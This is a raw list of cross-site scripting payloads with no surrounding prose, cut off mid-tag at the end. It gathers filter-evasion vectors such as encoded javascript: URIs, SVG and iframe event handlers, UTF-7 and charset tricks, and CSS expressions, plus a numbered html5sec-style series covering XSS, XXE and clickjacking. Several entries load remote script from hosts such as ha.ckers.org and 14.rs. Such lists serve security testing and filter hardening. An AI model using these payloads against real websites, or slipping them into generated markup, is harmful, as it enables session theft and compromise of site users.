src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> ? <svg><script ?>alert(1) <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> <img src=`xx:xx`onerror=alert(1)> <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>? <math><a xlink:href="//jsfiddle.net/t846h/">click <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>? <svg contentScriptType=text/vbs><script>MsgBox+1 <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script ???????????? <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)> <script>+-+-1-+-+alert(1)</script> <body/onload=&lt;!--&gt;&#10alert(1)> <script itworksinallbrowsers>/*<script* */alert(1)</script ? <img src ?itworksonchrome?\/onerror = alert(1)??? <svg><script>//&NewLine;confirm(1);</script </svg> <svg><script onlypossibleinopera:-)> alert(1) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe <script x> alert(1) </script 1=2 <div/onmouseover='alert(1)'> style="x:"> <--`<img/src=` onerror=alert(1)> --!> <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> ? <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>? "><img src=x onerror=window.open('https://www.google.com/');> <form><button formaction=javascript&colon;alert(1)>CLICKME <math><a xlink:href="//jsfiddle.net/t846h/">click <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>? <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a> "><img src=x onerror=prompt(1);> <SCRIPT>alert('XSS');</SCRIPT> '';!--"<XSS>=&{()} <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert(&quot;XSS&quot;)> <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> SRC=&#10<IMG 6;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav&#x09;ascript:alert('XSS');"> <IMG SRC="jav&#x0A;ascript:alert('XSS');"> <IMG SRC="jav&#x0D;ascript:alert('XSS');"> <IMG SRC=" &#14; javascript:alert('XSS');"> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT SRC=http://ha.ckers.org/xss.js?<B> <IMG SRC="javascript:alert('XSS')" <SCRIPT>a=/XSS/ \";alert('XSS');// <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS')"> <BODY ONLOAD=alert('XSS')> <IMG DYNSRC="javascript:alert('XSS')"> <IMG LOWSRC="javascript:alert('XSS')"> <BGSOUND SRC="javascript:alert('XSS');"> <BR SIZE="&{alert('XSS')}"> <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <IMG SRC='vbscript:msgbox("XSS")'> <IMG SRC="mocha:[code]"> <IMG SRC="livescript:[code]"> <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <TABLE BACKGROUND="javascript:alert('XSS')"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> <DIV STYLE="width: expression(alert('XSS'));"> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> <XSS STYLE="xss:expression(alert('XSS'))"> exp/*<XSS STYLE='no\xss:noxss("*//*"); <STYLE TYPE="text/javascript">alert('XSS');</STYLE> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <BASE HREF="javascript:alert('XSS');//"> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> getURL("javascript:alert('XSS')") a="get"; <!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert('XSS');"> <XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML> <HTML><BODY> <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"--> <? echo('<SCR)'; <META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;"> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <svg%0Aonload=%09((pro\u006dpt))()// <sCriPt x>(((confirm)))``</scRipt x> <w="/x="y>"/OndbLcLick=`<`[confir\u006d``]>z <deTAiLs/open/oNtoGGle=confirm()> <scRiPt y="><">/*<sCRipt* */prompt()</script <A href="javascript%26colon;confirm()">click <sVg oNloaD=write()> <A href=javas%26#99;ript:alert(1)>click <sCrIpt/"<a"/srC=data:=".<a,[8].some(confirm)> <svG/x=">"/oNloaD=confirm()// <--`<iMG/srC=` onerror=confirm``> --!> <SVg </onlOad ="1> (_=prompt,_(1)) ""> <!--><scRipT src=//14.rs> <sCriPt/src=//14.rs? <sCRIpt x=">" src=//15.rs></script> <D3/OnMouSEenTer=[2].find(confirm)>z <D3"<"/OncLick="1>[confirm``]"<">z <D3/OnpOinTeReENter=confirm``>click here <!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //> <Z oncut=alert()>x <iFrAMe/src \/\/onload = prompt(1) <dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x> >>> vectors() <div id="1"><form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>//["'`-->]]>]</div><div id="2"><meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi//["'`-->]]>]</div><div id="3"><meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>//["'`-->]]>]</div><div id="4">0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))//["'`-->]]>]</div><div id="5"><script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(5)',384,null,'rsa-dual-use')</script>//["'`-->]]>]</div><div id="6"><script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>//["'`-->]]>]</div><div id="7"><input onfocus=alert(7) autofocus>//["'`-->]]>]</div><div id="8"><input onblur=alert(8) autofocus><input autofocus>//["'`-->]]>]</div><div id="9"><a style="-o-link:'javascript:alert(9)';-o-link-source:current">X</a>//["'`-->]]>]</div><div id="10"><video poster=javascript:alert(10)//></video>//["'`-->]]>]</div><div id="11"><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(11)"></g></svg>//["'`-->]]>]</div><div id="12"><body onscroll=alert(12)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>//["'`-->]]>]</div><div id="13"><x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>//["'`-->]]>]</div><div id="14"><input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>//["'`-->]]>]</div><div id="15"><script>({0:#0=alert/#0#/#0#(0)})</script>//["'`-->]]>]</div><div id="16">X<x style=`behavior:url(#default#time2)` onbegin=`alert(16)` >//["'`-->]]>]</div><div id="17"><?xml-stylesheet href="javascript:alert(17)"?><root/>//["'`-->]]>]</div><div id="18"><script xmlns="http://www.w3.org/1999/xhtml">&#x61;l&#x65;rt&#40;1)</script>//["'`-->]]>]</div><div id="19"><meta charset="x-mac-farsi">¼script ¾alert(19)//¼/script ¾//["'`-->]]>]</div><div id="20"><script>ReferenceError.prototype.__defineGetter__('name', function(){alert(20)}),x</script>//["'`-->]]>]</div><div id="21"><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(21)')()</script>//["'`-->]]>]</div><div id="22"><input onblur=focus() autofocus><input>//["'`-->]]>]</div><div id="23"><form id=test onforminput=alert(23)><input></form><button form=test onformchange=alert(2)>X</button>//["'`-->]]>]</div><div id="24">1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=alert(24)&gt;`>//["'`-->]]>]</div><div id="25"><script src="#">{alert(25)}</script>;1//["'`-->]]>]</div><div id="26">+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);//["'`-->]]>]</div><div id="27"><style>p[foo=bar{}*{-o-link:'javascript:alert(27)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>//["'`-->]]>]</div> <div id="28">1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=alert(28)&gt;>//["'`-->]]>]</div> <div id="29"><link rel=stylesheet href=data:,*%7bx:expression(alert(29))%7d//["'`-->]]>]</div><div id="30"><style>@import "data:,*%7bx:expression(alert(30))%7D";</style>//["'`-->]]>]</div><div id="31"><frameset onload=alert(31)>//["'`-->]]>]</div><div id="32"><table background="javascript:alert(32)"></table>//["'`-->]]>]</div><div id="33"><a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(33);">XXX</a></a><a href="javascript:alert(2)">XXX</a>//["'`-->]]>]</div><div id="34">1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>//["'`-->]]>]</div><div id="35">1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(35) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>//["'`-->]]>]</div><div id="36"><a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(36)">XXX</a>//["'`-->]]>]</div><div id="37"><!--<img src="--><img src=x onerror=alert(37)//">//["'`-->]]>]</div><div id="38"><comment><img src="</comment><img src=x onerror=alert(38)//">//["'`-->]]>]</div> <div id="39"><!-- up to Opera 11.52, FF 3.6.28 --> <![><img src="]><img src=x onerror=alert(39)//"> <!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+ --> <svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>//["'`-->]]>]</div> <div id="40"><style><img src="</style><img src=x onerror=alert(40)//">//["'`-->]]>]</div> <div id="41"><li style=list-style:url() onerror=alert(41)></li> <div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(41)></div>//["'`-->]]>]</div> <div id="42"><head><base href="javascript://"/></head><body><a href="/. /,alert(42)//#">XXX</a></body>//["'`-->]]>]</div> <div id="43"><?xml version="1.0" standalone="no"?> <html xmlns="http://www.w3.org/1999/xhtml"> <head><style type="text/css">@font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";}</style></head> <body>Hello</body> </html>//["'`-->]]>]</div> <div id="44"><style>*[{}@import'test.css?]{color: green;}</style>X//["'`-->]]>]</div><div id="45"><div style="font-family:'foo[a];color:red;';">XXX</div>//["'`-->]]>]</div><div id="46"><div style="font-family:foo}color=red;">XXX</div>//["'`-->]]>]</div><div id="47"><svg xmlns="http://www.w3.org/2000/svg"><script>alert(47)</script></svg>//["'`-->]]>]</div><div id="48"><SCRIPT FOR=document EVENT=onreadystatechange>alert(48)</SCRIPT>//["'`-->]]>]</div><div id="49"><OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(49)"></OBJECT>//["'`-->]]>]</div><div id="50"><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>//["'`-->]]>]</div><div id="51"><embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>//["'`-->]]>]</div><div id="52"><x style="behavior:url(test.sct)">//["'`-->]]>]</div> <div id="53"><xml id="xss" src="test.htc"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label>//["'`-->]]>]</div> <div id="54"><script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>//["'`-->]]>]</div><div id="55"><video><source onerror="alert(55)">//["'`-->]]>]</div><div id="56"><video onerror="alert(56)"><source></source></video>//["'`-->]]>]</div><div id="57"><b <script>alert(57)//</script>0</script></b>//["'`-->]]>]</div><div id="58"><b><script<b></b><alert(58)</script </b></b>//["'`-->]]>]</div><div id="59"><div id="div1"><input value="``onmouseover=alert(59)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>//["'`-->]]>]</div><div id="60"><div style="[a]color[b]:[c]red">XXX</div>//["'`-->]]>]</div> <div id="61"><div style="\63&#9\06f&#10\0006c&#12\00006F&#13\R:\000072 Ed;color\0\bla:yellow\0\bla;col\0\00 \&#xA0or:blue;">XXX</div>//["'`-->]]>]</div> <div id="62"><!-- IE 6-8 --> <x '="foo"><x foo='><img src=x onerror=alert(62)//'> <!-- IE 6-9 --> <! '="foo"><x foo='><img src=x onerror=alert(2)//'> <? '="foo"><x foo='><img src=x onerror=alert(3)//'>//["'`-->]]>]</div> <div id="63"><embed src="javascript:alert(63)"></embed> // O10.10↓, OM10.0↓, GC6↓, FF <img src="javascript:alert(2)"> <image src="javascript:alert(2)"> // IE6, O10.10↓, OM10.0↓ <script src="javascript:alert(3)"></script> // IE6, O11.01↓, OM10.1↓//["'`-->]]>]</div> <div id="64"><!DOCTYPE x[<!ENTITY x SYSTEM "http://html5sec.org/test.xxe">]><y>&x;</y>//["'`-->]]>]</div><div id="65"><svg onload="javascript:alert(65)" xmlns="http://www.w3.org/2000/svg"></svg>//["'`-->]]>]</div> <div id="66"><?xml version="1.0"?> <?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(66)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?> <root/>//["'`-->]]>]</div> <div id="67"><!DOCTYPE x [ <!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "xx:x"onerror CDATA "alert(67)"onload CDATA "alert(2)">]><img />//["'`-->]]>]</div> <div id="68"><doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml"> <html:style /><x xlink:href="javascript:alert(68)" xlink:type="simple">XXX</x></doc>//["'`-->]]>]</div> <div id="69"><card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(69)"/></onevent><timer value="1"/></card>//["'`-->]]>]</div><div id="70"><div style=width:1px;filter:glow onfilterchange=alert(70)>x</div>//["'`-->]]>]</div><div id="71"><// style=x:expression\28alert(71)\29>//["'`-->]]>]</div><div id="72"><form><button formaction="javascript:alert(72)">X</button>//["'`-->]]>]</div><div id="73"><event-source src="event.php" onload="alert(73)">//["'`-->]]>]</div><div id="74"><a href="javascript:alert(74)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>//["'`-->]]>]</div><div id="75"><script<{alert(75)}/></script </>//["'`-->]]>]</div><div id="76"><?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "test.dtd"><x>&x;</x>//["'`-->]]>]</div><div id="77"><?xml-stylesheet type="text/css"?><root style="x:expression(alert(77))"/>//["'`-->]]>]</div><div id="78"><?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:test.xdr"/>//["'`-->]]>]</div><div id="79"><object allowscriptaccess="always" data="test.swf"></object>//["'`-->]]>]</div><div id="80"><style>*{x:expression(alert(80))}</style>//["'`-->]]>]</div><div id="81"><x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(81)" xlink:type="simple"/>//["'`-->]]>]</div><div id="82"><?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>//["'`-->]]>]</div> <div id="83"><x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(83)"><x:timer value="1"/></x:template>//["'`-->]]>]</div> <div id="84"><x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(84)//#x"/>//["'`-->]]>]</div><div id="85"><x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="test.evt#x"/>//["'`-->]]>]</div><div id="86"><body oninput=alert(86)><input autofocus>//["'`-->]]>]</div> <div id="87"><svg xmlns="http://www.w3.org/2000/svg"> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(87)"><rect width="1000" height="1000" fill="white"/></a> </svg>//["'`-->]]>]</div> <div id="88"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <animation xlink:href="javascript:alert(88)"/> <animation xlink:href="data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(88)'%3E%3C/svg%3E"/> <image xlink:href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(88)'%3E%3C/svg%3E"/> <foreignObject xlink:href="javascript:alert(88)"/> <foreignObject xlink:href="data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(88)%3C/script%3E"/> </svg>//["'`-->]]>]</div> <div id="89"><svg xmlns="http://www.w3.org/2000/svg"> <set attributeName="onmouseover" to="alert(89)"/> <animate attributeName="onunload" to="alert(89)"/> </svg>//["'`-->]]>]</div> <div id="90"><!-- Up to Opera 10.63 --> <div style=content:url(test2.svg)></div> <!-- Up to Opera 11.64 - see link below --> <!-- Up to Opera 12.x --> <div style="background:url(test5.svg)">PRESS ENTER</div>//["'`-->]]>]</div> <div id="91">[A] <? foo="><script>alert(91)</script>"> <! foo="><script>alert(91)</script>"> </ foo="><script>alert(91)</script>"> <? foo="><x foo='?><script>alert(91)</script>'>"> <! foo="[[[x]]"><x foo="]foo><script>alert(91)</script>"> <% foo><x foo="%><script>alert(91)</script>">//["'`-->]]>]</div> <div id="92"><div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div><div id="93"><div style="list-style:url(http://foo.f)\20url(javascript:alert(93));">X</div>//["'`-->]]>]</div> <div id="94"><svg xmlns="http://www.w3.org/2000/svg"> <handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(94)</handler> </svg>//["'`-->]]>]</div> <div id="95"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <feImage><set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/></feImage> </svg>//["'`-->]]>]</div> <div id="96"><iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe> <iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>//["'`-->]]>]</div> <div id="97"><!-- IE 5-9 --> <div id=d><x xmlns="><iframe onload=alert(97)"></div> <script>d.innerHTML+='';</script> <!-- IE 10 in IE5-9 Standards mode --> <div id=d><x xmlns='"><iframe onload=alert(2)//'></div> <script>d.innerHTML+='';</script>//["'`-->]]>]</div> <div id="98"><div id=d><div style="font-family:'sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>//["'`-->]]>]</div> <div id="99">XXX<style> *{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */ <!-- --><!--*{color:red} /* all UA */ *{background:url(xx:x //**/\red/*)} /* IE 6-7 Standards mode */ </style>//["'`-->]]>]</div> <div id="100"><img[a][b]src=x[d]onerror[c]=[e]"alert(100)">//["'`-->]]>]</div><div id="101"><a href="[a]java[b]script[c]:alert(101)">XXX</a>//["'`-->]]>]</div><div id="102"><img src="x` `<script>alert(102)</script>"` `>//["'`-->]]>]</div><div id="103"><script>history.pushState(0,0,'/i/am/somewhere_else');</script>//["'`-->]]>]</div> <div id="104"><svg xmlns="http://www.w3.org/2000/svg" id="foo"> <x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(104) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/> </svg>//["'`-->]]>]</div> <div id="105"><iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>//["'`-->]]>]</div><div id="106"><img src onerror /" '"= alt=alert(106)//">//["'`-->]]>]</div><div id="107"><title onpropertychange=alert(107)></title><title title=></title>//["'`-->]]>]</div> <div id="108"><!-- IE 5-8 standards mode --> <a href=http://foo.bar/#x=`y></a><img alt="`><img src=xx:x onerror=alert(108)></a>"> <!-- IE 5-9 standards mode --> <!a foo=x=`y><img alt="`><img src=xx:x onerror=alert(2)//"> <?a foo=x=`y><img alt="`><img src=xx:x onerror=alert(3)//">//["'`-->]]>]</div> <div id="109"><svg xmlns="http://www.w3.org/2000/svg"> <a id="x"><rect fill="white" width="1000" height="1000"/></a> <rect fill="white" style="clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);"/> </svg>//["'`-->]]>]</div> <div id="110"><svg xmlns="http://www.w3.org/2000/svg"> <path d="M0,0" style="marker-start:url(test4.svg#a)"/> </svg>//["'`-->]]>]</div> <div id="111"><div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div><div id="112"><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div> <div id="113"><div id="x">XXX</div> <style>#x{font-family:foo[bar;color:green;}#y];color:red;{}</style>//["'`-->]]>]</div> <div id="114"><x style="background:url('x[a];color:red;/*')">XXX</x>//["'`-->]]>]</div> <div id="115"><!--[if]><script>alert(115)</script --> <!--[if<img src=x onerror=alert(2)//]> -->//["'`-->]]>]</div> <div id="116"><div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=alert(116)&gt;">//["'`-->]]>]</div> <div id="117"><a href="http://attacker.org"> <iframe src="http://example.org/"></iframe> </a>//["'`-->]]>]</div> <div id="118"><div draggable="true" ondragstart="event.dataTransfer.setData('text/plain','malicious code');"><h1>Drop me</h1></div> <iframe src="http://www.example.org/dropHere.html"></iframe>//["'`-->]]>]</div> <div id="119"><iframe src="view-source:http://www.example.org/" frameborder="0" style="width:400px;height:180px"></iframe> <textarea type="text" cols="50" rows="10"></textarea>//["'`-->]]>]</div> <div id="120"><script>function makePopups(){for (i=1;i<6;i++) {window.open('popup.html','spam'+i,'width=50,height=50');}}</script> <body><a href="#" onclick="makePopups()">Spam</a>//["'`-->]]>]</div> <div id="121"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:svg="http://www.w3.org/2000/svg"> <body style="background:gray"> <iframe src="http://example.com/" style="width:800px; height:350px; border:none; mask: url(#maskForClickjacking);"/> <svg:svg><svg:mask id="maskForClickjacking" maskUnits="objectBoundingBox" maskContentUnits="objectBoundingBox"><svg:rect x="0.0" 